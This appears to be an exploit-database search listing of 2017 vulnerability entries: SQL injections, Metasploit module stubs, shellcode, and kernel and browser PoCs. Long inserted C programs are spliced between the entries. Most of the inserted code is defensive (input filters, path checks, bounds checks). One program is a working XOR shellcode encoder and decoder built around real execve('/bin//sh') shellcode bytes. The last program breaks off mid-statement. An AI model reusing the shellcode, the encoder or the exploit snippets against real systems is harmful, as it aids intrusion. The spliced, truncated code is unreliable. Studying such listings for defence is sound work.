47885 matches found
Microsoft Windows - 'jscript!RegExpComp::Compile' Heap Overflow Through IE or Local Network via WPAD
var s = 'a'; for(var i=0;i [...] <!-- ============================================...
Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator)
Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode Generator. Shellcode exploit for Generator platform #!/usr/bin/python from random import randint encoded = "" encoded2 = "" badchars = 0x00 shellcode = "\x90" +...
Joomla! Component NextGen Editor 2.1.0 - 'plname' SQL Injection
Exploit Title: Joomla! Component NextGen Editor 2.1.0 - SQL Injection Dork: N/A Date: 19.12.2017 Vendor Homepage: http://nextgeneditor.com/ Software Link: https://extensions.joomla.org/extension/nextgen-editor/ Software Download:...
Trend Micro Smart Protection Server - Session Hijacking / Log File Disclosure / Remote Command Execution / Cron Job Injection / Local File Inclusion / Stored Cross-Site Scripting / Improper Access Control
Trend Micro Smart Protection Server Multiple Vulnerabilities 1. Advisory Information Title: Trend Micro Smart Protection Server Multiple Vulnerabilities Advisory ID: CORE-2017-0008 Advisory URL: http://www.coresecurity.com/advisories/trend-micro-smart-protection-server-multiple-vulnerabilities...
Intel Content Protection HECI Service - Type Confusion Privilege Escalation
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1358 Intel Content Protection HECI Service Type Confusion EoP Platform: Tested on Windows 10, service version 9.0.2.117 Class: Elevation of Privilege Summary: The Intel Content Protection HECI Service exposes a DCOM object to all...
Microsoft Windows - 'jscript!JsArraySlice' Uninitialized Variable
var x = new URIError(new Array, undefined, undefined); String.prototype.localeCompare.call(x, new Date(0, 0, 0, 0, 0, 0, undefined)); Array.prototype.slice.call(1); <!-- ============================================ Technical details: The issue is in jscript!JsArraySlice (Array.prototype.slice.call) in the P...
Microsoft Windows - 'jscript!NameTbl::GetValDef' Use-After-Free
var vars = new Array(100); for(var i=0;i [...] <!-- ============================================ PoC for WPAD (might require page heap to trigger the crash): ============================================ function FindProxyForURL(url,...
Microsoft Windows - 'jscript!RegExpFncObj::LastParen' Out-of-Bounds Read
function go() { var r = new RegExp(Array(100).join('')); ''.search(r); alert(RegExp.lastParen); } go(); r rax=0000000000000063 rbx=000000000476fd90 rcx=0000000000000063 rdx=0000000000000064 rsi=000000000476fd90 rdi=000007fef23d37d0 rip=000007fef23d3813 rsp=00000000130f9090 rbp=00000000130f9148 r8=00000000130f9210...
Zoom Linux Client 2.0.106600.0904 - Command Injection
CONVISO-17-003 - Zoom Linux Client Command Injection Vulnerability (RCE) 1. Advisory Information Conviso Advisory ID: CONVISO-17-003 CVE ID: CVE-2017-15049 CVSS v2: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) Date: 2017-10-01 2. Affected Components Zoom client for Linux, version 2.0.106600.0904 (zoom_amd64.deb)...
Cells Blog 3.5 - 'bgid' / 'fmid' / 'fnid' SQL Injection
Exploit Title: Cells Blog 3.5 - SQL Injection Dork: N/A Date: 16.12.2017 Vendor Homepage: http://www.cells.tw/ Software Link: http://www.cells.tw/cells/ Version: 3.5 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE: N/A Exploit Author: Ihsan Sencan Author Web: http://ihsan.net Author Social:...
Joomla! Component User Bench 1.0 - 'userid' SQL Injection
Exploit Title: Joomla! Component User Bench 1.0 - SQL Injection Dork: N/A Date: 18.12.2017 Vendor Homepage: http://www.gegabyte.org/ Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/user-bench/ Version: 1.0 Category: Webapps Tested on:...
Western Digital MyCloud - 'multi_uploadify' File Upload (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule < Msf::Exploit::Remote [...] 'HEAD', :uri => '/web/', :pattern => /Apache/ include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info=...
GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Remote Code Execution
#!/usr/bin/python GoAhead httpd/2.5 to 3.6.5 LD_PRELOAD remote code execution exploit EDB Note: Payloads https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43360.zip EDB Note: Source https://www.elttam.com.au/blog/goahead/ EDB Note: Source...
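The GoAhead entry above is an environment-injection bug: request parameters were copied into the CGI child's environment by name, so a parameter called LD_PRELOAD reached the dynamic loader of the spawned CGI binary (the exploit points it at /proc/self/fd/0 so the request body is the preloaded library). The following C is an added example, not GoAhead's code or its patch; it shows the check a CGI launcher needs before exporting client-named variables. The policy it encodes (plain identifier, no name beginning with LD_ in any case) and the sample request are assumptions for the example; a strict allow-list of the standard CGI variable names is stronger still.

```c
/* Added example, not GoAhead's code or its fix: filter client-supplied
 * variable names before they are exported into a CGI child's environment. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* 1 if name may be exported: a plain identifier ([A-Za-z_][A-Za-z0-9_]*)
 * that does not start with "LD_" in any case.  LD_PRELOAD, LD_LIBRARY_PATH,
 * LD_AUDIT and friends are all honoured by the loader of a freshly exec'd,
 * non-setuid CGI binary, so the whole prefix is refused (assumed policy). */
int cgi_env_name_safe(const char *name) {
    if (name == NULL || name[0] == '\0') return 0;
    if (!(isalpha((unsigned char)name[0]) || name[0] == '_')) return 0;
    for (const char *p = name; *p; p++)
        if (!(isalnum((unsigned char)*p) || *p == '_')) return 0;
    if (toupper((unsigned char)name[0]) == 'L' &&
        toupper((unsigned char)name[1]) == 'D' && name[2] == '_') return 0;
    return 1;
}

/* Build a NULL-terminated envp from parallel name/value arrays, dropping
 * (not escaping) every unsafe name.  Returns the number of entries kept,
 * or -1 on allocation failure / cap too small; envp is always left
 * NULL-terminated so free_envp() can clean up either way. */
int build_cgi_envp(const char *const *names, const char *const *values,
                   size_t n, char **envp, size_t cap) {
    size_t kept = 0;
    if (cap == 0) return -1;
    envp[0] = NULL;
    for (size_t i = 0; i < n; i++) {
        if (!cgi_env_name_safe(names[i])) continue;
        if (kept + 1 >= cap) return -1;          /* keep room for the NULL */
        size_t len = strlen(names[i]) + 1 + strlen(values[i]) + 1;
        char *entry = malloc(len);
        if (entry == NULL) return -1;
        snprintf(entry, len, "%s=%s", names[i], values[i]);
        envp[kept++] = entry;
        envp[kept] = NULL;
    }
    return (int)kept;
}

void free_envp(char **envp) {
    for (size_t i = 0; envp[i] != NULL; i++) free(envp[i]);
    envp[0] = NULL;
}

/* 1 if envp carries a variable with exactly this name. */
int envp_has(char *const *envp, const char *name) {
    size_t l = strlen(name);
    for (size_t i = 0; envp[i] != NULL; i++)
        if (strncmp(envp[i], name, l) == 0 && envp[i][l] == '=') return 1;
    return 0;
}

/* Constructed request: what a naive launcher would derive from the query
 * string of an attack like the one above, plus ordinary CGI variables.
 * Note the raw query string is harmless as a *value*; only names matter. */
static const char *const SAMPLE_NAMES[]  = { "QUERY_STRING", "LD_PRELOAD",
    "ld_preload", "HTTP_USER_AGENT", "REMOTE ADDR" };
static const char *const SAMPLE_VALUES[] = { "LD_PRELOAD=/proc/self/fd/0",
    "/proc/self/fd/0", "/proc/self/fd/0", "curl/7.55", "10.0.0.5" };
#define SAMPLE_N (sizeof SAMPLE_NAMES / sizeof SAMPLE_NAMES[0])

/* Filter the constructed request; return how many variables survived
 * (-1 on error) and, via *ld_leaked, whether any LD_ variable got through. */
int filter_sample(int *ld_leaked) {
    char *envp[8];
    int kept = build_cgi_envp(SAMPLE_NAMES, SAMPLE_VALUES, SAMPLE_N, envp, 8);
    *ld_leaked = envp_has(envp, "LD_PRELOAD") || envp_has(envp, "ld_preload");
    for (int i = 0; i < kept; i++) printf("kept: %s\n", envp[i]);
    free_envp(envp);
    return kept;
}

int main(void) {
    int leaked;
    int kept = filter_sample(&leaked);
    printf("%d variables exported, loader variables leaked: %s\n",
           kept, leaked ? "YES" : "no");
    return leaked;
}
```

Dropping rather than renaming a bad variable is deliberate: a renamed variable still lets a client probe which names the server treats specially. The same filter belongs in front of any exec of a child with a client-influenced environment, not only CGI.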
Joomla! Component My Projects 2.0 - SQL Injection
Exploit Title: Joomla! Component My Projects 2.0 - SQL Injection Dork: N/A Date: 18.12.2017 Vendor Homepage: http://www.gegabyte.org/ Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/portfolio/my-projects/ Version: 2.0 Category: Webapps Tested on:...
Zoom Linux Client 2.0.106600.0904 - Stack-Based Buffer Overflow (PoC)
CONVISO-17-002 - Zoom Linux Client Stack-based Buffer Overflow Vulnerability 1. Advisory Information Conviso Advisory ID: CONVISO-17-002 CVE ID: CVE-2017-15048 CVSS v2: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) Date: 2017-10-01 2. Affected Components Zoom client for Linux, version 2.0.106600.0904...
Outlook for Android - Attachment Download Directory Traversal
''' There is a directory traversal issue in attachment downloads in Outlook for Android. There is no path sanitization on the attachment filename in the app. If the email account is a Hotmail account, this will be sanitized by the server, but for other accounts it will not be. This allows a file ...
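The Outlook for Android entry above comes down to one missing check: an attachment name supplied by the mail server was joined to the download directory without being reduced to a single path component. The C below is an added example, not Outlook's code, showing that check in its two usual forms (reject outright, or keep only the basename) and a join that refuses to produce a path when the name fails. The download directory and the sample names are assumptions for the example.

```c
/* Added example, not Outlook's code: validate an untrusted attachment
 * file name before it is joined to the download directory. */
#include <stdio.h>
#include <string.h>

/* 1 if name is a plain file name usable as a single path component:
 * non-empty, not "." or "..", no '/' or '\\', no control characters. */
int attachment_name_safe(const char *name) {
    if (name == NULL || *name == '\0') return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0) return 0;
    for (const char *p = name; *p; p++) {
        unsigned char c = (unsigned char)*p;
        if (c == '/' || c == '\\') return 0;   /* would escape the directory */
        if (c < 0x20 || c == 0x7f) return 0;   /* newline/NUL-adjacent tricks */
    }
    return 1;
}

/* Strip any directory part an untrusted name carries (either separator)
 * and return the remaining basename, or NULL when nothing safe remains.
 * Use this only when the policy is "keep the file, fix the name";
 * rejecting outright (attachment_name_safe) is simpler to reason about. */
const char *attachment_basename(const char *name) {
    const char *base = name;
    for (const char *p = name; *p; p++)
        if (*p == '/' || *p == '\\') base = p + 1;
    return attachment_name_safe(base) ? base : NULL;
}

/* Join dir and an untrusted name into out.  Returns 1 and fills out only
 * when the name passes the check and the result fits; otherwise returns 0
 * and leaves out empty, so a caller that forgets to test the return value
 * still cannot open a traversal path. */
int attachment_download_path(const char *dir, const char *name,
                             char *out, size_t cap) {
    if (cap) out[0] = '\0';
    if (!attachment_name_safe(name)) return 0;
    int n = snprintf(out, cap, "%s/%s", dir, name);
    if (n < 0 || (size_t)n >= cap) { if (cap) out[0] = '\0'; return 0; }
    return 1;
}

int main(void) {
    /* Constructed attachment names as a server might deliver them. */
    const char *names[] = { "report.pdf", "../../../data/data/evil",
                            "sub/evil.so", "..\\evil.so", ".." };
    const char *dir = "/sdcard/Download";        /* assumed directory */
    char path[128];
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++) {
        int ok = attachment_download_path(dir, names[i], path, sizeof path);
        const char *base = attachment_basename(names[i]);
        printf("%-28s reject=%d  basename=%s  path=%s\n", names[i], !ok,
               base ? base : "(none)", ok ? path : "(refused)");
    }
    return 0;
}
```

Run the check on the fully decoded name (after any percent- or MIME-decoding the client performs), and on the same string that is finally passed to the file API; checking an earlier representation and then decoding again reintroduces the bug.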
CDex 1.96 - Buffer Overflow (PoC)
#!/usr/bin/python Exploit Author: bzyo Twitter: @bzyo Exploit Title: CDex 1.96 - Local Stack Buffer Overflow Date: 17-12-2017 Vulnerable Software: CDex 1.96 Unicode Build Vendor Homepage: http://cdex.mu/ Version: v1.96 Software Link: http://cdex.mu/?q=download Tested On: Windows 7 x32 PoC: generat...
Joomla! Component Guru Pro - 'promocode' SQL Injection
Exploit Title: Joomla! Component Guru Pro 'promocode' - SQL Injection Dork: N/A Date: 17.12.2017 Vendor Homepage: https://www.ijoomla.com/ Software Link: https://www.ijoomla.com/component/digistore/products/47-joomla-add-ons/119-guru-pro/189?Itemid=189 Version: N/A Category: Webapps Tested on:...
Ciuis CRM 1.0.7 - SQL Injection
Exploit Title: Ciuis CRM v1.0.7 SQL Injection Google Dork: if applicable Date: 12/15/2017 Exploit Author: Zahid Abbasi Contact: http://twitter.com/zahidsec Website: http://zahidabbasi.com Vendor Homepage: http://ciuis.com/ Software Link: https://codecanyon.net/item/ciuis-crm/20473489 Version:...
Joomla! Component JB Visa 1.0 - 'visatype' SQL Injection
Exploit Title: Joomla! Component JB Visa 1.0 - SQL Injection Dork: N/A Date: 17.12.2017 Vendor Homepage: http://joombooking.com/ Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/jb-visa/ Version: 1.0 Category: Webapps Tested on:...
Monstra CMS 3.0.4 - (Authenticated) Arbitrary File Upload / Remote Code Execution
Exploit Title: Monstra CMS - 3.0.4 RCE Vendor Homepage: http://monstra.org/ Software Link: https://bitbucket.org/Awilum/monstra/downloads/monstra-3.0.4.zip Discovered by: Ishaq Mohammed Contact: https://twitter.com/securityprince Website: https://about.me/security-prince Category: webapps Platfor...
Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode
Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode. Shellcode exploit for Linux_x86-64 platform global _start section .text _start: jmp find_address ; jmp short by default decoder: ; Get the address of the string pop rdi push rdi pop rbx ; get the first byte and bruteforce till you get the toke...
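The two Linux/x64 entries above are the two halves of one scheme: a Python generator that XORs the payload with a key and filters a bad character (0x00), and an asm decoder stub that does not carry the key but recovers it from the first byte and then decodes until it hits a terminator token. The C below is an added example, not the generator or the stub from either entry; it models both halves in plain C so the invariants can be checked (no null byte and no token byte in the encoded stream, and a blind round trip that recovers the original). The terminator value, the key-search starting point and the sample payload (a standard execve("/bin//sh") stub, never executed here) are assumptions for the example.

```c
/* Added example, not the page's generator or decoder stub: model the
 * single-byte XOR + terminator scheme and check its invariants in C. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Standard execve("/bin//sh") x86-64 stub, 23 bytes, already null-free.
 * Constructed sample input for the encoder; it is never executed here. */
static const uint8_t SAMPLE_SC[] = {
    0x48, 0x31, 0xf6,                         /* xor  rsi, rsi            */
    0x56,                                     /* push rsi                 */
    0x48, 0xbf, 0x2f, 0x62, 0x69, 0x6e,       /* mov  rdi, "/bin//sh"     */
                0x2f, 0x2f, 0x73, 0x68,
    0x57,                                     /* push rdi                 */
    0x54,                                     /* push rsp                 */
    0x5f,                                     /* pop  rdi                 */
    0x6a, 0x3b,                               /* push 59 (SYS_execve)     */
    0x58,                                     /* pop  rax                 */
    0x99,                                     /* cdq                      */
    0x0f, 0x05                                /* syscall                  */
};
#define SAMPLE_LEN (sizeof SAMPLE_SC)
#define BAD_CHAR   0x00   /* the one bad char the generator above filters */

/* 1 if any byte of buf equals c. */
int has_byte(const uint8_t *buf, size_t n, uint8_t c) {
    for (size_t i = 0; i < n; i++) if (buf[i] == c) return 1;
    return 0;
}

/* Pick a non-zero key, scanning upward from start (wrapping), such that no
 * encoded byte equals BAD_CHAR or the terminator token.  -1 if none. */
int xor_pick_key(const uint8_t *sc, size_t n, uint8_t token, uint8_t start) {
    for (int t = 0; t < 256; t++) {
        uint8_t k = (uint8_t)(start + t);
        if (k == 0) continue;                 /* key 0 would be a no-op */
        int ok = 1;
        for (size_t i = 0; i < n && ok; i++) {
            uint8_t e = sc[i] ^ k;
            if (e == BAD_CHAR || e == token) ok = 0;
        }
        if (ok) return k;
    }
    return -1;
}

/* out = (sc XOR key) || token.  Returns bytes written, 0 if out is too small. */
size_t xor_encode(const uint8_t *sc, size_t n, uint8_t key, uint8_t token,
                  uint8_t *out, size_t cap) {
    if (n + 1 > cap) return 0;
    for (size_t i = 0; i < n; i++) out[i] = sc[i] ^ key;
    out[n] = token;
    return n + 1;
}

/* Decoder model: the key is not transmitted.  Like the asm stub, try keys
 * until the first byte decodes to the expected value, then decode until
 * the token.  Returns plaintext length, 0 on failure (no key, no token,
 * or out too small). */
size_t xor_decode_bruteforce(const uint8_t *enc, size_t enc_len,
                             uint8_t first_plain, uint8_t token,
                             uint8_t *out, size_t cap) {
    if (enc_len == 0) return 0;
    int key = -1;
    for (int k = 1; k < 256; k++)
        if ((uint8_t)(enc[0] ^ k) == first_plain) { key = k; break; }
    if (key < 0) return 0;
    size_t n = 0;
    for (size_t i = 0; i < enc_len; i++) {
        if (enc[i] == token) return n;        /* terminator reached */
        if (n >= cap) return 0;
        out[n++] = enc[i] ^ (uint8_t)key;
    }
    return 0;                                 /* ran off the end: no token */
}

/* Encode the sample, decode it blind, and return the key used on a clean
 * round trip; -1 if no key works or the round trip fails. */
int xor_roundtrip_key(uint8_t token, uint8_t start) {
    uint8_t enc[64], dec[64];
    int key = xor_pick_key(SAMPLE_SC, SAMPLE_LEN, token, start);
    if (key < 0) return -1;
    size_t elen = xor_encode(SAMPLE_SC, SAMPLE_LEN, (uint8_t)key, token, enc, sizeof enc);
    if (elen == 0 || has_byte(enc, elen, BAD_CHAR)) return -1;
    size_t dlen = xor_decode_bruteforce(enc, elen, SAMPLE_SC[0], token, dec, sizeof dec);
    if (dlen != SAMPLE_LEN || memcmp(dec, SAMPLE_SC, dlen) != 0) return -1;
    return key;
}

int main(void) {
    int key = xor_roundtrip_key(0xaa, 0x41);  /* 0xaa: hypothetical terminator */
    printf("round trip %s, key = 0x%02x\n", key < 0 ? "FAILED" : "ok",
           key < 0 ? 0 : key);
    return key < 0;
}
```

The terminator must be excluded from the encoded body by the key choice, not by luck: a payload byte that happens to encode to the token would truncate decoding at that point, which is exactly the failure a stub that scans for the token cannot detect at run time. A real generator also has to keep the decoder stub itself free of the bad characters, which the asm above handles by construction and this model does not cover.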
Movie Guide 2.0 - SQL Injection
Exploit Title: Movie Guide 2.0 - SQL Injection Dork: N/A Date: 15.12.2017 Vendor Homepage: http://applebitemedia.com/ Software Link: http://applebitemedia.com/amwdl/AMMovieGuide.tar.gz Version: 2.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE: N/A Exploit Author: Ihsan Sencan Author Web:...
Linux kernel < 4.10.15 - Race Condition Privilege Escalation
/* PoC for CVE-2017-10661, triggers UAF with KASan enabled in kernel 4.10 */ [16 #include lines, header names lost in extraction] #define RACE_TIME 1000000 int fd; int fd_dumb; int count=0; void *list_add_thread(void *arg) in...
ITGuard-Manager 0.0.0.1 - Remote Code Execution
Vulnerability Title: ITGuard-Manager V0.0.0.1 PreAuth Remote Code Execution Author: Nassim Asrir Contact: [email protected] / @asrirnassim CVE: Waiting ... CVSS: CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H/E:H/MAV:P Vendor: http://www.innotube.co...
Sync Breeze 10.2.12 - Denial of Service
============================================= MGC ALERT 2017-007 - Original release date: November 30, 2017 - Last revised: December 14, 2017 - Discovered by: Manuel García Cárdenas - Severity: 7.5/10 CVSS Base Score - CVE-ID: CVE-2017-17088 ============================================= I...
Dup Scout Enterprise - 'Login' Buffer Overflow (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule < Msf::Exploit::Remote [...] 'Name' => 'Dup Scout Enterprise Login Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Dup Scout Enterprise 10.0.18. The...
Advantech WebAccess 8.2-2017.03.31 - Webvrpcs Service Opcode 80061 Stack Buffer Overflow (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule < Msf::Exploit::Remote [...] 'Name' => 'Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in...
pfSense 2.4.1 - Cross-Site Request Forgery Error Page Clickjacking (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule < Msf::Exploit::Remote [...] 'Name' => 'Clickjacking Vulnerability In CSRF Error Page pfSense', 'Description' => %q{ This module exploits a Clickjacking vulnerability in pfSense 'Yorick...
Paid To Read Script 2.0.5 - 'uid' / 'fnum' / 'fn' SQL Injection
Exploit Title: Paid To Read Script 2.0.5 - SQL Injection Dork: N/A Date: 13.12.2017 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/paid-to-read-script/ Version: 2.0.5 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE: CVE-2017-17651...
Readymade Video Sharing Script 3.2 - HTML Injection
Exploit Title: Readymade Video Sharing Script 3.2 - HTML Injection Dork: N/A Date: 13.12.2017 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/php-video-sharing-script/ Demo: http://www.smsemailmarketing.in/demo/videosharing/ Version: 3.2...
Microsoft Office - Dynamic Data Exchange 'DDE' Payload Delivery (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule < Msf::Exploit::Remote [...] 'Name' => 'Microsoft Office DDE Payload Delivery', 'Description' => %q{ This module generates a DDE command to place within a Word document, that when...
FS Lynda Clone 1.0 - SQL Injection
...
Linksys WVBR0 - 'User-Agent' Remote Command Injection
#!/usr/bin/python # -*- coding: utf-8 -*- # Author: Nixawk # CVE-2017-17411 Linksys WVBR0 25 Command Injection """ $ python2.7 exploit-CVE-2017-17411.py Usage: python exploit-CVE-2017-17411.py [...] $ python2.7 exploit-CVE-2017-17411.py http://example.com/ [+] Target is exploitable by CVE-2017-17411 """ import...
Palo Alto Networks Firewalls - Root Remote Code Execution
This is a public advisory for CVE-2017-15944 which is a remote root code execution bug in Palo Alto Networks firewalls. Three separate bugs can be used together to remotely execute commands as root through the web management interface without authentication on: PAN-OS 6.1.18 and earlier, PAN-OS...
Piwigo 2.9.1 - 'cat_true' / 'cat_false' SQL Injection
Exploit Title: Piwigo <= 2.9.1 - 'cat_true'/'cat_false' SQL Injection Dork: N/A Date: 12.12.2017 Vendor Homepage: http://piwigo.org/ Software Link: http://piwigo.org/basics/downloads Version: <= 2.9.1 Category: Webapps Tested on: WiN7x64/WIN10X64 CVE: CVE-2017-10682 Exploit Author: Akityo Email:...
Bus Booking Script 1.0 - 'txtname' SQL Injection
...
Multiple OEM - 'nsd' Remote Stack Format String (PoC)
Subject: Remote Stack Format String in 'nsd' binary from multiple OEM Attack vector: Remote Authentication: Anonymous (no credentials needed) Researcher: bashis (December 2017) PoC: https://github.com/mcw0/PoC Release date: December 14, 2017 Full Disclosure: 0-Day - PoC - 1 $ curl...
Joomla! Component JEXTN Question And Answer 3.1.0 - SQL Injection
Exploit Title: Joomla! Component JEXTN Question And Answer 3.1.0 - SQL Injection Dork: N/A Date: 13.12.2017 Vendor Homepage: http://jextn.com/ Software Link: https://extensions.joomla.org/extensions/extension/communication/question-a-answers/jextn-question-and-answer/ Version: 3.1.0 Category:...
Joomla! Component JEXTN Video Gallery 3.0.5 - 'id' SQL Injection
Exploit Title: Joomla! Component JEXTN Video Gallery 3.0.5 - SQL Injection Dork: N/A Date: 13.12.2017 Vendor Homepage: http://jextn.com/ Software Link: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/jextn-video-gallery/ Version: 3.0.5 Category: Webapps Tested on:...
Meinberg LANTIME Web Configuration Utility 6.16.008 - Arbitrary File Read
Title: Meinberg LANTIME Web Configuration Utility - Arbitrary File Read Author: Jakub Palaczynski CVE: CVE-2017-16787 Exploit tested on: ================== Meinberg LANTIME Web Configuration Utility 6.16.008 Vulnerability affects: ====================== All LTOS6 firmware releases before 6.24.004...
GNU C Library Dynamic Loader glibc ld.so - Memory Leak / Buffer Overflow
Qualys Security Advisory Buffer overflow in glibc's ld.so ======================================================================== Contents ======================================================================== Summary Memory Leak Buffer Overflow Exploitation Acknowledgments...
vBulletin 5.x - 'cacheTemplates' Remote Arbitrary File Deletion
SSD Advisory – vBulletin cacheTemplates Unauthenticated Remote Arbitrary File Deletion Source: https://blogs.securiteam.com/index.php/archives/3573 Vulnerability Summary The following advisory describes an unauthenticated deserialization vulnerability that leads to arbitrary file deletion and, unde...
vBulletin 5.x - 'routestring' Remote Code Execution
SSD Advisory – vBulletin routestring Unauthenticated Remote Code Execution Source: https://blogs.securiteam.com/index.php/archives/3569 Vulnerability Summary The following advisory describes an unauthenticated file inclusion vulnerability that leads to remote code execution found in vBulletin...
Accesspress Anonymous Post Pro < 3.2.0 - Arbitrary File Upload
Exploit Title: Unauthenticated Arbitrary File Upload Date: November 12, 2017 Exploit Author: Colette Chamberland Author contact: [email protected] Author homepage: https://defiant.com Vendor Homepage: https://accesspressthemes.com/ Software Link:...
Vivotek IP Cameras - Remote Stack Overflow (PoC)
Subject: Vivotek IP Cameras - Remote Stack Overflow Researcher: bashis (September-October 2017) PoC: https://github.com/mcw0/PoC Release date: November 13, 2017 Full Disclosure: 43 days Attack Vector: Remote Authentication: Anonymous (no credentials needed) Firmware Vulnerable: Only 2017 versions...
Apple XNU Kernel - Memory Corruption due to Integer Overflow in __offsetof Usage in posix_spawn on 32-bit Platforms
posix_spawn is a complex syscall which takes a lot of arguments from userspace. The third argument is a pointer to a further arguments descriptor in userspace with the following structure on 32-bit: struct user32_posix_spawn_args_desc { uint32_t attr_size; /* size of attributes block */ uint32_t attrp; /*...
Joomla! Component JBuildozer 1.4.1 - 'appid' SQL Injection
Exploit Title: Joomla! Component JBuildozer 1.4.1 - SQL Injection Dork: N/A Date: 12.12.2017 Vendor Homepage: http://jbuildozer.com/ Software Link: https://extensions.joomla.org/extensions/extension/authoring-a-content/content-construction/jbuildozer/ Version: 1.4.1 Category: Webapps Tested on:...
Apple macOS/iOS - Multiple Kernel Use-After-Frees due to Incorrect IOKit Object Lifetime Management in IOTimeSyncClockManagerUserClient
/* Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1377 IOTimeSyncClockManagerUserClient provides the userspace interface for the IOTimeSyncClockManager IOService. IOTimeSyncClockManagerUserClient overrides the IOUserClient::clientClose method but it treats it like a destructor...
Apple macOS - Kernel Code Execution due to Lack of Bounds Checking in AppleIntelCapriController::GetLinkConfig
/* Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1375 AppleIntelCapriController::GetLinkConfig trusts a user-supplied value in the structure input which it uses to index a small table of pointers without bounds checking. The OOB-read pointer is passed to...
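The two Apple kernel entries above (the posix_spawn 32-bit integer overflow and the GetLinkConfig unchecked table index) are both failures to validate a user-supplied structure before using it. The C below is an added example, not XNU or Apple driver code, that models the two checks in user space: a bounds-checked lookup into a small pointer table, compared unsigned so a "negative" 32-bit value cannot pass, and a size computation done in 32-bit arithmetic with overflow detection, so that the same count that is harmless on 64-bit is caught where it wraps. The table, the structure layouts, the sizes and the upper bound are assumptions for the example; the overflow builtins are the GCC/Clang ones.

```c
/* Added example, not XNU/Apple code: validate structure input from user
 * space (1) as a table index and (2) in 32-bit size arithmetic. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* --- (1) user-supplied index into a small pointer table ---------------- */
typedef int (*link_handler_t)(void);
static int h_off(void)  { return 0; }
static int h_dp(void)   { return 1; }
static int h_hdmi(void) { return 2; }
static link_handler_t link_table[] = { h_off, h_dp, h_hdmi };   /* assumed table */
#define LINK_TABLE_LEN (sizeof link_table / sizeof link_table[0])

/* Hypothetical structure input as copied in from user space. */
struct link_config_in { uint32_t link_index; uint32_t flags; };

/* The unchecked pattern: any index reads a pointer past the table and the
 * caller then jumps through it.  Correct only for in-range input; here for
 * comparison, never fed an out-of-range value. */
link_handler_t lookup_unchecked(const struct link_config_in *in) {
    return link_table[in->link_index];
}

/* Bounds-checked: NULL for any index outside the table.  The field is
 * unsigned, so 0xffffffff is rejected rather than treated as -1. */
link_handler_t lookup_checked(const struct link_config_in *in) {
    if (in->link_index >= LINK_TABLE_LEN) return NULL;
    return link_table[in->link_index];
}

/* --- (2) size arithmetic as a 32-bit kernel would do it ---------------- */
/* Hypothetical 32-bit user descriptor (pointers are 32-bit user addresses). */
struct user32_args_desc {
    uint32_t attr_size;            /* size of attributes block */
    uint32_t attrp;                /* user pointer to it */
    uint32_t file_actions_count;   /* number of fixed-size entries that follow */
};
#define ARGS_HEADER_SIZE 16u       /* assumed fixed header */
#define FILE_ACTION_SIZE 12u       /* assumed per-entry size */
#define MAX_COPYIN       (1u << 20)/* assumed sane upper bound for one copyin */

/* Naive: what uint32_t arithmetic silently does.  A count of 0x40000000
 * entries of 12 bytes is 0x300000000, which wraps to 0, so the "total"
 * is just the header and the later copy runs far past the allocation. */
uint32_t total_size_naive(const struct user32_args_desc *d) {
    return ARGS_HEADER_SIZE + d->attr_size + d->file_actions_count * FILE_ACTION_SIZE;
}

/* Checked: every step tested for wrap in the same 32-bit type, then capped.
 * Returns 0 and stores the size, or -1 if the request cannot be honoured. */
int total_size_checked(const struct user32_args_desc *d, uint32_t *out) {
    uint32_t actions, total;
    if (__builtin_mul_overflow(d->file_actions_count, FILE_ACTION_SIZE, &actions)) return -1;
    if (__builtin_add_overflow(ARGS_HEADER_SIZE, d->attr_size, &total)) return -1;
    if (__builtin_add_overflow(total, actions, &total)) return -1;
    if (total > MAX_COPYIN) return -1;
    *out = total;
    return 0;
}

int main(void) {
    struct link_config_in cfg_ok = { 2, 0 }, cfg_bad = { 0xffffffffu, 0 };
    printf("index 2 -> %s, index 0xffffffff -> %s\n",
           lookup_checked(&cfg_ok) ? "handler" : "rejected",
           lookup_checked(&cfg_bad) ? "handler" : "rejected");

    /* Constructed descriptors: one honest, two that wrap in 32 bits. */
    struct user32_args_desc ds[] = { { 64, 0, 2 }, { 0, 0, 0x40000000u },
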